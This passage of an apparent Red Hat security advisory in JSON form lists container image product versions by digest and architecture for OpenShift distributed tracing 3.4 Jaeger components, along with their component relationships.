"registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3Ac81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3A8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Ae537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3Abb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3Ae7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3Ab541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3A952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3Ab0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3A60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3A44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3Ab9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3Afe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "s390x" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", 